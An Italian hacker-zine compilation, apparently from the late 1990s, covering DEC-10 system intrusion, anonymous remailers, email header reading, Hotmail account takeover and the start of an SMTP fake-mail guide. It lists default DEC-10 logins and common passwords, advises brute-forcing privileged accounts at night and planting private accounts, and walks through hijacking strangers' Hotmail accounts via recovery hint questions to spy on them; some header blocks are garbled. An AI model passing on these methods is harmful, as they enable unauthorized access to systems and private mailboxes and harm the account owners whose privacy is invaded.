Mentre con ".Help Phone" si puo' presentare l'occasione di fare un po' di 
conoscenza con i vari numeri di operatori o persone simili 
nell'amministrazione di sistema. 

I due numeri piu' importanti sono quelli del DEC-10 operator e del DEC-10 
staff; teneteli a mente perche' non si sa mai... 

Parlando invece di cose serie si puo' dire che il comando piu' importante di 
un DEC-10 e' "Systat" che da una lista di PPN, tempo trascorso, programmi in 
USO, ecc. 

Un abbreviazione del comando Systat e' SY. 

Piccolo esempio del comando Systat ( preso da una rivista ): 


Status of Brown University 603A at 11:52:33 on 29-Jan-96 
Uptime 187:12:22, 80%Null time = 80%idle + 0%Lost 
7 Jobs in use out of 128. 19 logged in 4 detached out of 89 ( LOGMAX ) 


Job Who What Run Time 


1 [OPR] OPSER 322 
2. [OPR] DIALOG 1:29 
3. [OPR] BATCON 4:01 
4. [OPR] SYSINE St:1301 
5 24,2 SYSTAT 4:52 
6 2332,21 DIRECT 2:22 
7, 32,22  SYSTAT 8:19 


Il Job non serve quasi a nulla poiche' indica solo la posizione all'interno 

del sistema per eventuali chat o messaggi ad un dato utente. 

[OPR] significa OPERATOR mentre i numeri tipo 24,2 sono i PPN regolari di 
normali utenti ( praticamente il loro login ). 

La colonna chiamata "what" indica invece che programma stanno eseguendo 
oppure cosa stanno facendo nel sistema. 

Run Time, infine, ti dice da quanto tempo sono connessi i vari utenti. 

Ora, dopo aver rimediato un PPN, bisogna tentare con la password. 

Prima di tutto inserite il PPN che abbiamo visto in questo modo poi tentate 
con le password di default o con quelle piu' comunemente usate. 


Lista di password maggiormente usate: 


Account 
Acsnet 
Computer 
Connect 
Dcl 

Dec 
Decnet 
Default 
Games 
Help 
Link 
List 
Modem 
Operator 
Password 
Ppn 
Secret 
Sex 
System 
Terminal 
Test 


Provate anche questa serie di PPN e queste password: 


Login: Password: 


1,2: SYSLIB, OPERATOR oppure MANAGER 
2}: MAINTAIN 
5,30: GAMES 


Dopo aver tentato queste provare anche quelle piu' comuni degli altri sistemi. 
Solitamente si hanno due tentativi per inserire PPN e Password corretti ( ma 
questo puo' anche non essere vero poiche' diversi DEC-10 permettono un numero 
illimitato di tentativi e poche volte comunicano i tentativi falliti di 

connessione ). 

Dopo che siamo riusciti ad entrare all'interno di questo sistema ci apparira' 

un messaggio di "introduzione" al sistema che ci avvertira' di alcune cose 

tra le quali il nostro Job ( cioe' la posizione all'interno del DEC ). 

E, di seguito, puo' apparire qualcosa del genere: 


Other jobs detached with the same PPN: 
Job 34 running SYSTAT in /C state 
Do you want to ATTACH to this job? yes 


Quello che stiamo facendo e' allegarci ad un idle PPN. Quando un altro utente 
e' sul sistema da circa 10 minuti prima di noi puo' mandare un comando che gli 
permette di effettuare un logoff e di riagganciarsi allo stesso posto quando 

si riconnette al sistema. A questo punto dopo aver usato "systat" per vedere 
l'effettivo allontanamento dal sistema possiamo usare "detach" per fare in 
modo di "attaccarci" al suo PPN. 

Oppure: 

Se un utente non inserisce comandi per diverso tempo puo' essere allontanato 
automaticamente dal sistema e quindi darci la possibilita' di attaccarci 
comunque al suo PPN. 

Ora che siamo dentro diamo un'altra occhiata a "systat" per vedere se 
qualcosa e' cambiato e per verificare la nostra presenza all'interno del 

sistema. 

Se volessimo cambiare la nostra password, il comando da usare e': 

/Password 


Comandi utili: 


Per guardare all'interno di directory si utilizza, o il comando Dir [*,*] 
per guardare in tutte le directory che gli utenti hanno reso pubbliche agli 
altri oppure con Dir [12,11] si guarda in una particolare. 

Ci sono in sostanza 5 tipi di file da tenere in cosiderazione: 

exe 

txt 

dat 

bas 

cmd 

I file chiamati exe sono gli eseguibili e possono essere lanciati senza 


problemi dal prompt dei comandi. 

I txt sono file di testo che si possono "sfogliare" con il comando Type 
nomefile.txt 

NON fate type con gli exe! 

Dat sono i dati che gli utenti hanno salvato mentre bas sono i file scritti 

in basic. 

Gli ultimi file, cmd, sono file di comando. Se ne incontriamo uno proviamo 
questo comando: Take nomefile.cmd. 

Un altro modo per leggere file e' usare il comando File:[*,*] 

Per creare una propria directory possiamo utilizzare il comando "Credir"; 

a questo punto bisogna specificare che esistono due livelli per una directory: 
il primo e' "Class" il secondo "Tvedit". 

Se ci vogliamo creare una directory personale e un ottimo account privato 
possiamo digitare: 

Create Directory:[,,class,tvedit] 

Il DEC-10 puo' replicare in questo modo: 

Created Dska0:[x,x,class]Sfd/protect:775 

Created Dska0:[x,x,class,tvedit]sfd/protect:775 

x,x e' il PPN che stiamo usando e Dska0 e' il device. 

Se vogliamo nominare la nostra directory appena creata possiamo farlo con il 
comando "/Name:" e possiamo proteggerla con il comando "/Protect". 

Ci sono altri comandi che iniziano per "/" e per vederli vi consiglio di 
provare un "/help". 


Account privati e privilegiati 


Ora, se state provando ad entrare in un DEC-10 credo che lo facciate per uno 
di questi tre motivi: 

1) Siete il proprietario stesso del DEC-10 e volete testarne la sicurezza; 

2) Siete alle prime armi e siete curiosi di provare questo tipo di sistema; 

3) Siete tizi con le palle e volete prendere i dati di questo sistema. 

Per qualsiasi di questi tre motivi la cosa che volete fare e' darvi la 

possibilita' di dominare il sistema, di prenderlo per le corna e farne cio' 

che volete...giusto? 

Comunque sia volete pieni privilegi. 

Su un DEC-10 il PPN della maggior parte degli account con pieni privilegi sul 
sistema incomincia per 1 ( ad esempio 1,10). 

Proviamo nuovamente ad usare il comando "systat" diamo un'occhiata attenta per 
trovare qualcuno che sia sotto un account che inizi per 1,x. 

Se lo troviamo, proviamo ad effettuare un login con quel PPN e iniziamo a 
cercare la password a tentativi ( anche se la cosa si rivelerebbe molto 

lunga ). 

Se riusciamo ad infiltrarci con successo possiamo attivare il nostro ( o i 

nostri ) account privati digitando il comando "enable" che ci dara' un prompt 

$ oppure #. 

A questo punto possiamo crearci un account alternativo dal nulla oppure fare 
un make up di uno esistente in questa maniera: 

$Build[x,x] o Create[x,x]. 

Una volta creato l'account editiamo il nostro PPN o modifichiamolo se esisteva 
gia e tutto e' finito. 

Se comunque riuscite a trovare un account da usare che abbia un PPN di 1,x 


non provatelo durante il giorno o le ore lavorative. 

Spesso solo gli admin hanno account del genere quindi vi consiglio di provarlo 
a notte inoltrata per evitare spiacevoli situazioni. 

Per continuare il discorso vorrei dire che ci sono tre livelli di sicurezza 
all'interno di un DEC-10: 

Operator 

Wheel 

Cia 

I privilegi chiamati Wheel e Cia ( che sta per Confidential Information 

Access ) sono i due livelli piu' importanti e potenti perche' permettono di 

fare qualsiasi cosa e in ogni posto. Operator sfrutta i normali privilegi che 

gli sono stati concessi per l'uso di QUEL terminale. 

Un manuale utile da leggere sarebbe il "Decsystem Timesharing Guide" ma non 
credo sia molto facile da rimediare. Questo comunque e' il manuale di utilizzo 
dei sistemi DEC e ti spiega in dettaglio tutti i comandi da usare e che si 
possono usare, nuovi programmi, nuove funzioni, ecc, ecc. 

Per richiederlo si deve telefonare all'operator al numero indicato sotto gli 
"Help Phone" ( vedi sopra ) ma non lo danno a tutti poiche' il sysop richiede 

la password il login e il motivo dell'utilizzo del manuale. 


Mail 


Apro una piccola parentesi sull'uso della mail nel DEC-10 che non e' 
fondamentale ma sapere come funziona non credo guasti. 

Per usare la posta elettronica su di un DEC-10 bisogna lanciare il comando 
"Run Mail" dal prompt. Fatto questo, in risposta dal sistema possiamo 
ottenere un prompt con la scritta "MailC". 

Se vogliamo controllare la nostra casella di posta digitiamo: 

MailC:read 

Se vogliamo spedire invece un messaggio usiamo il comando Send al posto di 
Read. 

Questo e' quello che potrebbe succedere: 


.-Run Mail 


MailC:Send 


to:RaggedRobin 

Subject:Solite Storie 

Text: 

Ciao. Bla Bla Bla Bla Bla Bla Bla Bla Bla 

Quando arriviamo alla conclusione del nostro messaggio possiamo concludere 
con .done o .d su di una linea vuota e questo indica al sistema che abbiamo 


finito di scrivere. 
Il DEC-10 a questo punto rispondera' con: RaggedRobin--Sent. 


Informazioni supplementari 

Provate ad inserire il comando "info" o "help info" nel prompt dei comandi e 
vi vedrete apparire una lista di comandi da usare insieme a questa forma: 
Info XXXX 


Switch Funzionamento 


Fornisce informazioni sul proprio job 


[??,2?] di " suun dato PPN 

ALL si ù su tutti i PPN 

ALL:LOPR è Ù sui job di tutti gli operatori locali(1,2) 
ALL:OPR bi "" sui job di tutti gli operatori (1,2) 
ALL:ROPR 5 d sui job di tutti gli operatori remoti 
ALL:Users È "su tutti gli utenti del sistema 

Batch s "su tutti i batch job 


Ho citato i piu' importanti ma ce ne sono altri quindi, per maggiori 
informazioni, effettuate il comando che ho menzionato sopra. 

I numeri 1,2 al fianco della voce Operatori Locali e Operatori significa che 
i loro account hanno pieni privilegi su quel sistema. 

Il comando Watch. 


Con questo comando si possono ottenere maggiori informazioni sulle proprie 
statistiche: 


Run Indica il CPU time 

Wait Indica il tempo trascorso dalla partenza nel sistema 

Read Numero dei blocchi di dischi che hai letto 

Write Numero dei blocchi di dischi che hai scritto 

Se tu hai privilegi di sistema prova ad usare questo comando: 
Watch[x,x] 

Questo ti puo' dare maggiori informazioni su di un utente in particolare. 
Altri comandi: 


Riporto in seguito alcuni comandi che potreste trovare utili o interessanti. 


Who Nome job #TTY 


Che potrebbe essere qualcosa del genere: 

Who RaggedRobin 4 #7 

Ovvero RaggedRobin e' inserito nel sistema nel job 4 e sul TTY 7. 

La risposta potrebbe essere il suo PPN e altre informazioni legate al suo 
stato sul sistema. 


Se qualche conoscente e' sul sistema e gli vogliamo lanciare un messaggio, 
sapendo che e' sul TTY10 possiamo digitare: 


Send TTY10 Messaggio 

Se invece vogliamo mandare una chat: 

Talk TTY10 

Se siamo riusciti ad ottenere pieni privilegi andiamo in enable e digitiamo: 
"Whostr" che puo' darci maggiori informazioni su gli utenti collegati al 


sistema e sulle directory presenti. 


Per concludere vorrei citare le combinazioni di ctrl+lettera e i vari tipi di 
reti alle quali sono connessi i computer della DEC. 


ctrl+h Backspace 

ctrl+c Interrompe una lunga lista o un programma 
ctrl+o Ferma un lungo output del terminale 

ctrl+t Tempo 

ctrl+u Killa la linea che stai digitando 

ctrl+x Ferma un programma 

ctrl+s Ferma una lista ( pausa ) 

ctrl+q Resume 

DECNET 


Questa rete e' supportata da tutti i computer della Digital Corporation. Per 
accedere a questa rete digitate "Decnet" e tentate di trovare la password. 
Decnet supporta nodi come VMS, TOPS10 ( sistema operativo per DEC-10 ), 
TOPS20 e altri. Solitamente l'account del system operator puo' esserti di 
aiuto se stai cercando la password per accedere a questa rete. Tenta la 
password dell'account del sysop e vedi se funziona. 


ACSNET 

Supporta DEC-10 e altri computer. Quando ci si connette si puo' trovare un 
messaggio del genere: 

ACSNET 

Fri Mar 13 19:30:23 1996 


Port ID: dialup C502 at 28.800 baud 


dialup C502 with even parity 
O qualcosa di simile. 


Dal prompt digitare "?" per una lista dei groupnames. Per entrare nel DEC-10 
da questo punto digitate "Acsdec10". 
I comandi per Acsnet sono: 

Connect 

Hangup 

Info 

Release 

Set 

Daytime 

Disconnect 

Help 

Resume 

WhoamI 


Se vogliamo scriverne una E-Mail anonima per rispondere qualcuno o per partecipare ad un 
NewsGroup senza essere rintracciati, 

Esiste un servizio, quello dei "remailer", che serve ad inviare posta 

senza mittente e senza alcuna traccia d’IP Address o altro. 

Esistono tre categorie di remailer. 

i Remailer Cypherpunk i quali spediscono il messaggio al destinatario eliminando 
preventivamente l'indirizzo contenuto. non è quindi possibile rispondere. il messaggio può 
ovviamente anche essere crittografato il remailer, lo decrittograferà e lo manderà all’indirizzo 
del destinatario . 

I Remailer Mixmaster i quali permettono di rispondere ai messaggi, per ricevere una risposta 
è necessario creare blocchi di risposta ovviamente crittografati cioè un insieme d'istruzione 
per raggiungere l'indirizzo reale è quindi necessario avere un programma per scrivere il 
messaggio 

I Remailer Pseudonimi questi si limitano ad eliminare l'Indirizzo E-Mail del mittente 
attribuendo uno pseudonimo il destinatario può rispondere tramite quel remailer. 

Per una lista completa con tutte le informazioni come: velocità,caratteristiche e affidabilità 
basta cercare le parole "anonymous remailer" con un qualsiasi motore di ricerca sul Web. 
http://www.replay.com/remailer/anon.html 

Una volta trovato l'indirizzo E-Mail di un remailer per conoscerne il suo funzionamento basta 
inviargli una E-Mail scrivendo nel campo Subject(oggetto) : " REMAILER-HELP" 

Per quanto riguarda la posta anonima tramite remailer, n’esistono anche sul Web. 

Per chi preferisse le Form ai programmi di posta elettronica basterà visitare il sito 
http://anonymouse-master.org/ dove tra l'altro è presente la possibilità di navigare in 
anonimato 

Alcuni Remailer 


Nome E-Mail 

Balls remailer@huge.cajones.com 
Cyber alias@alias.cyberpass.net 
Dustbin dustman@athensnet.com 
Exon remailer@remailer.nl.com 
Extropia remailer@miron.vip.best.com 
Haystack haystack@holy.cow.net 
Hidden remailer@hidden.net 

Jam remailer@cypherpunks.ca 
Lucifer lucifer@dhp.com 

Middle middleman@jpunix.com 

Mix mixmaster@remail.obscura.com 
Nym config@mym.alias.net 

Reno middleman@cyberpass.net 
Replay remailer@replay.com 


I Remailer sono attivi non per arrecare danni, ma per fornire un servizio a quanti vogliono 
preservare la propria privacy elettronica. Abusandone potreste mettervi nei guai, o causare la 
chiusura del servizio. Inoltre molti remailer possono negarvi l'accesso al servizio in caso di 
proteste da parte di terzi. 

Alcuni Remail conservano spesso i log di invio, quindi per una anonimato maggiore è possibile 
concatenare più remail 


Per scrivere E-Mail anonime si potrebbe usare anche un programma chiamato Telnet 
presente già in windows, questo non fa altro che collegarsi ad un server, inviargli tutto quello 
che scrivete e mostrarvi tutto quello che riceve, quindi, usando Telnet si può impersonare un 
qualsiasi programma client, parlando al server e leggendo le sue risposte, quindi c'è una 
buona percentuale d’anonimato. 

E mail vera o falsa? 

Per poter riconoscere una E-Mail vera da un falsa bisogna studiare il messaggio 

dobbiamo quindi poter leggerne gli "headers" (intestazioni), 

cioè le righe che iniziano con la parola "Received:" 

Per visualizzare gli headers: 

Netscape Mail, ad esempio, ha la voce "Show Headers" nel menù "Options", mentre con 
"Internet Explorer" è necessario clickare sul titolo dell'e-Mail da analizzare, quindi premere 
il tasto destro e scegliere l'ultima voce Proprietà. Eudora ed altri client hanno una funzione 
simile a quella di Netscape Mail . 

Ad esempio Visualizziamo gli headers di questa e-Mail: 

Received: from posta.abcd.it (111.123.11.32) by provider.it via mtad (2.3) 

id mx03-Biqmta0276; Mon, 29 Sep 2000 06:45:07 -0600 (MDT) 

Received: from america.com ([123.12.22.39]) by posta.abcd.it 

(post.office MTA v1.9.3b ID# 0-12345) with SMTP id AAA187 

for <utente@provider.it>; Mon, 29 Sep 2000 14:34:21 +0200 

From: <mittente@america.com> 

To: <utente@provider.it> 

Subject: test... 

Analizziamone gli headers: 

Il primo Received, 

L'header "Received" ci dice il percorso seguito dall'e-mail da quando è stato generata a 
quando l'abbiamo ricevuta. 

Normalmente ce n'è più di uno e sono disposti in ordine inverso quindi il primo rappresenta 
l'ultimo computer in cui è arrivata, di solito il nostro o quello del nostro provider e l'ultimo 
Received rappresenta il computer "mittente". 

Infatti, ogni volta che un server riceve una e-Mail, aggiunge un "Received" in cima alle altre 
intestazioni già presenti. 

Analizzando la nostra E-Mail, notiamo che l'ultimo "Received" ci dice che è stato il computer 
america.com con IP Address 123.12.22.39 a mandare l'e-Mail al server posta.abcd.it usando il 
servizio SMTP. 

Guardando l'header successivo, notiamo che il messaggio è stato mandato a sua volta da 
posta.abcd.it con IP Address 111.123.11.32 a provider.it, che e il server destinatario quindi il 
nostro 

Infatti, se guardiamo l'header "To:" si puo notare che il destinatario finale è 
utente@provider.it. 

Il mittente quindi , dovrebbe essere mittente@america.com, per esserne sicuri dobbiamo 
utilizzare un programma Finger con il quale possiamo sapere se il "mittente" esiste su 
"america.com", 

L'unico modo per sapere se effettivamente Host Name e IP Address coincidono è utilizzare un 
programma DNS. 

Questo metodo non ci permette di scoprire l'autore, ma almeno potremo sapere quale 
computer è stato usato per inviare e-mail. 


GUIDA AL REMAILER 


Mantenere la Privacy su Internet e' importante, siccome lo sanno tutti, non mi 
dilunghero' parlando della sua importanza, ma mi limitero' a descrivere come 
tutelarsi sulla Rete. In questo file spieghero' come Spedire Lettere TOTALMENTE 
Anonime. Tutti (credo/spero) conoscono l'esistenza dei 'REMAILER' (particolari 
mail-server che ricevono la tua lettera e la rispediscono al destinatario che 

desideri facendo cosi' perdere le TUE tracce), vediamo come si utilizzano. 


Dopo avere preparato la lettera 
Esempio: 

< succhia succhia succhia 

< CIAO VECCHIO LAMER, 
< COME TE LA PASSI? 


< slurpa slurpa slurpa 


Mettere sopra della lettera le seguenti 2 righe: 
Request-Remailing-To: INDIRIZZO 


Scrivendo, al posto di 'INDIRIZZO', l'indirizzo di posta elettronica a cui 
volete mandare il messaggio anonimo. 


A questo punto spedite la lettera NON all'indirizzo del Lamer, ma a quello di 
un Remailer. (Es. remailer@replay.com) 


Ecco come si presentera' la vostra lettera: 


{A NNN!N!!N!{“(M»\M 
To: remailer@replay.com 
Subject: 
TEWEPEIG5N55{5}5}5}5}5}) 


Request-Remailing-To: pinco_pallino@hotmail.com 


< succhia succhia succhia 

< CIAO VECCHIO LAMER, 
< COME TE LA PASSI? 

< slurpa slurpa slurpa 


Per "rafforzare" l'impossibilita' di essere beccati e' consigliato fare una 
"catena" di Remailer, questo e' davvero facile da fare: 


EE EWEWEPEPEOIGRN 
To: remailer@replay.com 
Subject: 

EE EWEPEOENNRNN 


Request-Remailing-To: remailer@anon.efga.org 
Request-Remailing-To: remailer@replay.com 
Request-Remailing-To: pinco_pallino@hotmail.com 


< succhia succhia succhia 

< CIAO VECCHIO LAMER, 
< COME TE LA PASSI? 

< slurpa slurpa slurpa 


In questo modo la lettera RIMBALZA da un remailer all'altro prima di arrivare 
al destinatario, in questo modo rintracciare il mittente e' difficilissimo 

(vorrei dire impossibile, ma non si sa mai... comunque nel file successivo 
"mpc!063.txt" imparerete altri piccoli trucchi per sfruttare al max i remailer) 


P.S. Spero di essere stato chiaro e comprensibile 


P.P.S. Come potete intuire lo svantaggio di questo sistema e' l'impossibilita' 
di essere "Replicati", ma credo che se lo state usando di certo non 
volete che il destinatario vi risponda! (quindi, di che vi lamentate?) 


P.P.P.S. Esistono tanti indirizzi Remailer, io ve ne ho dato 2: 
"remailer@replay.com" e remailer@anon.efga.or 
In questo file ho descritto alcune 'opzioni accessorie' di molti Remailer. 


Iniziamo con i 'Cutmarks'. Si usano aggiungendo la seguente linea: 
Cutmarks: *-*-*-* 

(*#-*-*-* e' un esempio, ma puo' essere sostituito con qualsiasi carattere) 

Il risultato sara' che il destinatario non ricevera' cio' che c'e' scritto 

dopo '*-*-*-*'). Lo scopo principale di questa opzione e' di non far pervenire 
La firma che spesso molti Mail-server mettono automaticamente in coda alla 


lettera (es. MAILEXCITE). 


Ecco come si presentera' la nostra lettera prima di essere spedita: 


[KKK:S!!SSNNNN 
To: remailer@replay.com 
Subject: 

IU TE E E_m<É "Ly! y-WM\M\]!I 


Request-Remailing-To: pinco_pallino@hotmail.com 
Cutmarks: *-*-*-* 


< succhia succhia succhia 

< CIAO VECCHIO LAMER, 
< COME TE LA PASSI? 

< slurpa slurpa slurpa 


e _R_A 

saluti da 
fumi \ 
| CRAZY RABBIT | 
\---_----___---- / 


ed ecco come arrivera' al destinatario: 


EEEWEPEPEBEOIDIRNNN 
From: remailer@replay.com 
Subject: (none) 
NN 


< succhia succhia succhia 

< CIAO VECCHIO LAMER, 
< COME TE LA PASSI? 

< slurpa slurpa slurpa 


Niente male vero? Ora vediamo la mia opzione preferita... 

Si chiama "Latent-Time" e permette di far mantere la nostra lettera in giacenza 

sul server per un tempo determinato in modo da ostacolare ulteriormente la 
eventuale individuazione del mittente. Vediamo come funziona: 

Bisogna semplicemente aggiungere "Latent-Time:" seguito da un "+" ed dal tempo 
che deve restare sul server (minore di 24 ore) nella linea successiva a quella 

di "Request-Remailing-To:". Esempio: 


E E E E E EWEWEPEPRPENh5h5N 
To: remailer@replay.com 
Subject: 

E E EWEWWEIN5SK$5K5K 


Request-Remailing-To: pinco_pallino@hotmail.com 


Latent-Time: +5:30 


< succhia succhia succhia 

< CIAO VECCHIO LAMER, 
< COME TE LA PASSI? 

< slurpa slurpa slurpa 


In questo caso il server aspettera' 5 ore e 30 minuti prima di rispedire il 
messaggio al destinatario. 


(1' inizio è semplice :-) 
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- introduzione 
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INTRODUZIONE 


Carissimi animali di rete... ormai è passato tanto tempo (informaticamente 
parlando) dalle mie prime chattate.. e per molti di voi vale la stesso 
discorso. Abbiamo cominciato come poveri newbie in un mondo sconosciuto e (a 
volte) assurdo. Ci siamo trovato quasi subito coinvolti in guerriglie urbane 
a colpi di nuke e siamo stati "costretti" ad imparare in fretta come 
difenderci.. come attaccare.. come spoofarci e come fregare le difese degli 
altri. 

E' stato divertente (quasi rimpiango quei giorni) ma il tempo passa.. la 
gente cambia.. le tecniche diventano obsolete e si cerca sempre qualcosa in 
piu'. Ci si rivolge a nuove frontiere (.. spazio.. ultima frontiera.. hihi) 

e ci si trova a giokerellare con trojani vari... a settare infinite 
configurazioni di linux prima per renderlo stabile.. poi per renderlo 

(quasi) inattaccabile e poi per tuffarci nella rete senza confini a cui 
sottostare.. o almeno questa è l'idea generale di partenza. 

Quello di cui voglio parlare oggi è un'altro bel giochetto... nulla di 

troppo impegnativo, sia chiaro.. è solo una stronzatina come tante sulla 
lunga strada ke stiamo percorrendo... e il bello è che da un certo punto di 
vista tutto ciò è completamente legaleeeeee!!!!!! :-) 


PERCHE' HACKARE UN ACCOUNT DI POSTA ? 


Una volta hanno chiesto ad un alpinista perchè si sbattesse per scalare 
l'Everest... lui semplicemente ha risposto :" Perchè è li !".. 

Da un certo punto di vista il nostro discorso è lo stesso... in più, come 
sempre, c'è l'inesauribile sete di conoscienza.. la curiosità.. e quel 

pizzico di malignità nel controllare qualcuno :-)) 

Potete riuscire ad avere il controllo di una persona che vi sta MOOOLTO sul 
cazzo e divertirvi un mondo con ciò ke scoprite.. 

Potete ottenere qualche web account per "impalare" un sito.. oppure per 
fottere allegramente tale spazio ed usarlo per vostri scopi... 

Potete spedire mails che risulteranno mandate da un'altra persona e causare 
dei bei casini... 


Già... non c'è assoulutamente di nobile in tutto questo... NON E' 
FANTASTICO ?!? ahahah 


PERCHE' HACKARE HOTMAIL ? 


Tre sono le motivazioni essenziali: 

1- Hotmail è attualmente uno dei più diffusi sulla rete. 

2 - E' il più semplice su cui effettuare la procedura che spiegherò poi. 
(FUNZIONA ANKE ALTROVE) 

3- Hotmail è di mamma Microsft.. e personalmente questo basta e avanza 
ahahahah 


COME FARE ? 


Questa è la parte più interessante, ma presenta un vantaggio e uno 
svantaggio. 

Lo svantaggio è che non è un metodo scientifico.. nun funziona sempre anche 
se da risultati positivi in un rapporto di 4/10 (e considerato COME faremo è 
un buon risultato) 

Il vantaggio... la cosa bella di questo metodo è che non dovremo realmente 
hackare nulla. Non dovremo sfondare il server per fregarli le password e se 
per alcuni può essere considerata una bestemmia (allora il bello dov'e' 

?!?!) per altri meno esperti è un modo sicuro per ottenere qualcosa senza 
rischiare il culetto. 


Ma procediamo con ordine: 

Il principio su cui su basa questo "hacking" è che la mamma degli imbecilli 

è sempre incinta!!! 

Già...spesso saranno gli stessi proprietari dell'account a fomirvi la 

password, ma non temete.. non si dovranno mandare decine di e-mail facendo 
social engineering. 

La faccenda è molto più semplice. Hotmail, come tanti altri server di posta 
sul web, offre una funzione per permette (a chi apre un account nuovo) di 


inserire una domanda di riserva la cui risposta è accettata per modificare 
la password di accesso nel caso la si sia dimenticata. 

Geniale vero ? Tanto studipo quanto geniale... e probabilmente avete una 
stima troppo alta della razza umana se credete che tutti gli utenti 
sfruttino questo servizio nel modo giusto!!! 


Vediamo in pratica come fare: 


1- Procuratevi qualche e-mail (ovviamente di hotmail). Se non conoscete 
nessuno con un account hm o cmq nessuno di veramente cretino fate una 
semplice ricerca da altavista. 


potete cercare 

@hotmail -> fornirà una lista immensa ma spesso saranno home pages 
personali 

guestbook +@hotmail -> qui ci sarà già da divertirsi 

annunci personali +@hotmail  -> e questa è la terra promessa!!!!!! 


trascrivete su carta un bel po' di e-mail e procediamo. (una volta concluso 
il punto 1 il grosso del lavoro è fatto) 


2- Andate all'home page di hotmail (www.hotmail.com) e cliccate sulla 
scritta gialla " Forgot Your Password ? " 

Si aprirà un'altra finestra in cui dovrete inserire l'user (è la parte 
precedente a @hotmail).. inserite il primo della lista che vi siete fatti, 
battete invio (o cliccate sul pulsante) e attendete. 


3- Se compare solo questo messaggio : 


If you have alternate email access, send a BLANK email message to 
forgotpass@hotmail.com and we will reply with further instructions 


vuol dire che l'utente non ha optato per non usare la domanda di riserva 
quindi passiamo oltre e proviamo con un'altro (aspirante) pollo. 

4- Se invece compare questo messaggio: 

ANSWER YOUR HINT 

seguito (sotto) da Question: e sotto ancora da Answer: (con relativo campo 
di immissione testo) siamo a cavallo! Forse ci siamo 

Dando un'okkiata alla domanda ke vi viene posta possono verificarsi diversi 


casi 


* la domanda è molto personale quindi a meno di un enorme colpo di culo non 
potete indovinarla 


* nella domanda compare la parola NOTSET.. un'altro buco nell'acqua 


* la domanda è una presa per il culo per chi tenta di hackarla... è una 

cosa molto divertente 

ke mi è capitata qualke volta. La domanda era del tipo : PENSI CHE SIA 
IDIOTA ? oppure 

HAI PENSATO DI HACKARE TUA SORELLA ? cmq sia ancora nulla di fatto! 


* invece della domanda trovate un codice numerico, alfabetico o 
alfanumerico : BINGO! 
avete appena trovato un cretino!! Già.. quella è la password 


* la domanda non è difficilissima e potreste indovinarla e cambiare la 
password (parlerò poi 
più a lungo di questo aspetto) 


5- Una volta ottenuta la password.... beh.. fate un po' voi eheh 


ESEMPI 


Oltre ai casi in cui la password compare in tutto il suo splendore come una 
visione di fatima ce ne sono altri in cui ci si arriva con un po' di testa 
oppure con un po' di culo. 

Ecco alcuni casi che mi sono capitati 


Question: Twelth April Thirteen Forty Eight 


Rgionamento: 12 aprile 1348.... data storica ? nascita di qualcuno ? 
Avvenimento ? 


Soluzione: molto piu' semplice di quanto pensassi... basta ricordare che le 
date in inglese vanno scritte col mese prima del giorno : 04121348 


Soluzione: abbiamo sempre la tendenza ad essere esterofili... questa domanda 
nel resto del mondo occindentale (e un po' ovunque) ha una sola risposta : 
venezia 


Question: La mia birra preferita 


Ragionamento: beh.. sono tante.. heinecken... becks... guinness.. sono 


quelle ke vanno di più 


Soluzione: beh... io preferisco senza dubbio la: ceres 
gran botta di culo questa.. lo ammetto.. anche se si poteva trovare 
facilmente in 10 minuti per tentativi 


ce ne sarebbero tanti da raccontare.. ma non vedo perche' togliervi il 
divertimento :-) 
in fondo è un po' come fare i cruciverba.. allena la mente! 


CONSIGLI 


Ora avete la "vostra" scorta di e-mail... cosa fare ? 
bah.. questo dipende da voi.. dalla vostra fantasia e dalla vostra voglia... 
permettetemi però un paio di consigli: 


Non cambiate mai la password di un account, o cmq fatelo solo in casi 
estremi. Se tagliate fuori il prorietario dell'account il gioco finisce 
presto. 


Troverete forse informazioni riservate o compromettenti (io ho beccato un 
avvocato gay con foto e mail piuttosto spinte).. non fate stronzate perchè 
un conto è giocare a spiare qua e la.. un'altro è rischiare di mandare 
seriamente nella merda una persona! 


Ho letto di un'altro metodo per avere password di hotmail: si doveva 
scrivere ad un certo indirizzo specificando l'user della mail da hackare e 
la PROPRIA password.. non siate così cretini per favore! 


AVVERTENZE E VOCI DI CORRIDOIO 


Voci di corridio raccontano che hotmail sia sia svegliata e stia cercando di 
proteggere la riservatezza dei propri utenti tramite dei coockies. Di per 

certo non so dirvi nulla ora come ora. Il mio pc cancella i biskottini (di 

merda) ad ogni riavvio e non ho avuto modo di controllare approfonditamente. 
Francamente non so nemmeno ke genere di garanzia diano i coockies... ad ogni 
modo: 

IN CAMPANA !!!! 


Come spedire delle FakeMail 


+- +- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 


Autore : SpiDeR2K 


e-mail : spider2k@freemail.it 

SIto Web : http://go.to/tankcommandos ; quello personale al più presto. 
Cibi assunti : nessuno 

Musica ascoltata : di tutto di più ( non la rai !) : Mtv 

Font Usato : Lucida Sans Unicode (9) 


Prima di cominciare... 
@-@-@-@-@-@-@-@ DISCLAIMER @-@-@-@-@-@-@-@ 


QUESTO TESTO E' DA CONSIDERARSI SOLTANTO A SCOPO 
INFORMATIVO ED EDUCATIVO, PERTANTO L'AUTORE, SpiDeR2K, 
NON SI ASSUME NESSUNA RESPONSABILITA'SULLE STRONZATE 
CHE IL LETTORE PUO' COMMETTERE DOPO AVER LETTO QUESTE 
INFORMAZIONI. 


@-@-@-@-@-@-@-@-@-Y-®@-@-@ -@-@-@-@ -@-V-@-V-@-@ 


Bene Bene, oggi parleremo di come spedire una fakemail. Prima di cominciare, 

volevo precisare che per questo articolo ho preso spunto dall' enciclopedia 

dell' hacking del miticissimo Lord Shiva , che rimane una delle migliori guide 

all'hacking italiane , esistenti nella rete. Cominciamo subito col dire , che fakemail 

significa letteralmente "falsa e-mail". Supponiamo 

per un momento di voler spedire un e-mail a qualcuno senza rivelare 

la nostra identità ( i motivi sono cazzi vostri :-)). ebbene per scopi del genere 

possiamo utilizzare le fakemail. 

Esistono due modi : il primo ( un pò da lamah ) consiste nel cercare un sito che offra al 
visitatore questo servizio. Ma visto che a noi interessa il percorso 

logico e pratico che bisogna fare per spedire una fakemail , utilizzeremo il secondo metodo , 
ovvero quello manuale. Ne approfitterò inoltre per introdurre Telnet e l' SMTP . 

Per spedire una fakemail , utilizzeremo uno dei pochi programmi 

utili messi a disposizione in Windows : Telnet. 

Questo , ci permette di stabilire MANUALMENTE una connessione 

ad un server permettendoci di interagire direttamente con il sistema remoto . Si trova 

nella directory Windows del vostro hard disk. Una prima schermata, ci chiede di inserire 

un host name ( il nome del computer o il corrispondente IP address ) e una porta. 

